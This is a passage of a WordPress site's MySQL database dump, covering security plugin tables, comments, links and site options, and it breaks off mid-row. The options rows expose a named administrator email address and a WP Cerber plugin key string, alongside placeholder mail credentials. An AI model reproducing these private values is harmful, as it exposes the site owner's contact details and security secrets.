/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_aiowps_permanent_block`
--
DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`blocked_ip` varchar(100) NOT NULL DEFAULT '',
`block_reason` varchar(128) NOT NULL DEFAULT '',
`country_origin` varchar(50) NOT NULL DEFAULT '',
`blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
`unblock` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_aiowps_permanent_block`
--
LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_cerber_files`
--
DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_files` (
`scan_id` int(10) unsigned NOT NULL,
`scan_type` int(10) unsigned NOT NULL DEFAULT 1,
`scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
`scan_status` int(10) unsigned NOT NULL DEFAULT 0,
`file_status` int(10) unsigned NOT NULL DEFAULT 0,
`file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`file_name` text NOT NULL,
`file_type` int(10) unsigned NOT NULL DEFAULT 0,
`file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`hash_match` int(10) unsigned NOT NULL DEFAULT 0,
`file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
`file_perms` int(11) NOT NULL DEFAULT 0,
`file_writable` int(10) unsigned NOT NULL DEFAULT 0,
`file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
`file_ext` varchar(255) NOT NULL DEFAULT '',
`extra` text NOT NULL,
PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_cerber_files`
--
LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_cerber_sets`
--
DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
`the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`the_id` bigint(20) NOT NULL DEFAULT 0,
`the_value` longtext NOT NULL,
`expires` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_cerber_sets`
--
LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('garbage_collector',0,'1624621785',0),('_background_tasks',0,'a:1:{s:40:\"d5e690918740ad0fcf9adc87b81a1182c28dc8ed\";a:1:{s:4:\"func\";s:23:\"cerber_upgrade_deferred\";}}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"754a29ba69cc66d475116611049b5729\";i:1;i:1624621785;i:4;s:40:\"SK//VJXCFQBA0UEW72DRLIT8P3ZH4MS6K9GYO1N5\";}',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_cerber_uss`
--
DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
`user_id` bigint(20) unsigned NOT NULL,
`ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
`country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`started` int(10) unsigned NOT NULL,
`expires` int(10) unsigned NOT NULL,
`session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
`wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_cerber_uss`
--
LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_commentmeta`
--
DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_commentmeta`
--
LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT 'comment',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
KEY `comment_date_gmt` (`comment_date_gmt`),
KEY `comment_parent` (`comment_parent`),
KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_comments`
--
LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_links`
--
DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
`link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`link_url` varchar(255) NOT NULL DEFAULT '',
`link_name` varchar(255) NOT NULL DEFAULT '',
`link_image` varchar(255) NOT NULL DEFAULT '',
`link_target` varchar(25) NOT NULL DEFAULT '',
`link_description` varchar(255) NOT NULL DEFAULT '',
`link_visible` varchar(20) NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) NOT NULL DEFAULT '',
`link_notes` mediumtext NOT NULL,
`link_rss` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`link_id`),
KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_links`
--
LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_options`
--
DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
`option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`option_name` varchar(191) NOT NULL DEFAULT '',
`option_value` longtext NOT NULL,
`autoload` varchar(20) NOT NULL DEFAULT 'yes',
PRIMARY KEY (`option_id`),
UNIQUE KEY `option_name` (`option_name`),
KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=157270 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_options`
--
LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','http://www.dogstardesign.co.uk','yes'),(2,'home','http://www.dogstardesign.co.uk','yes'),(3,'blogname','Dog & Star Design','yes'),(4,'blogdescription','Expert Internet Marketing Advice for Small Businesses','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','amber.platts@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','closed','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/%postname%','yes'),(29,'rewrite_rules','a:94:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=34&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins1','a:8:{i:0;s:37:\"wp-hide-security-enhancer/wp-hide.php\";i:1;s:27:\"ad-inserter/ad-inserter.php\";i:2;s:19:\"akismet/akismet.php\";i:3;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:4;s:9:\"hello.php\";i:5;s:27:\"js_composer/js_composer.php\";i:6;s:41:\"post-type-switcher/post-type-switcher.php\";i:7;s:47:\"quick-featured-images/quick-featured-images.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','gambit','yes'),(41,'stylesheet','gambit','yes'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','49752','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:5:{i:1;a:0:{}i:2;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:47:\"[contact-form-7 id=\"62\" title=\"Contact form 1\"]\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:3;a:4:{s:5:\"title\";s:25:\"Our London HQ in Victoria\";s:4:\"text\";s:384:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2483.857647425315!2d-0.13704573423040622!3d51.49747972963342!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x487604dc26fd45c1%3A0x58731d015ab25427!2sVictoria+St%2C+Westminster%2C+London+SW1H+0HW!5e0!3m2!1sen!2suk!4v1509009405642\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:4;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:356:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<!-- responsive text ad -->\r\n<ins class=\"adsbygoogle\"\r\n style=\"display:block\"\r\n data-ad-client=\"ca-pub-2121528995419082\"\r\n data-ad-slot=\"2075591400\"\r\n data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:1:{s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','34','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:64:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"mode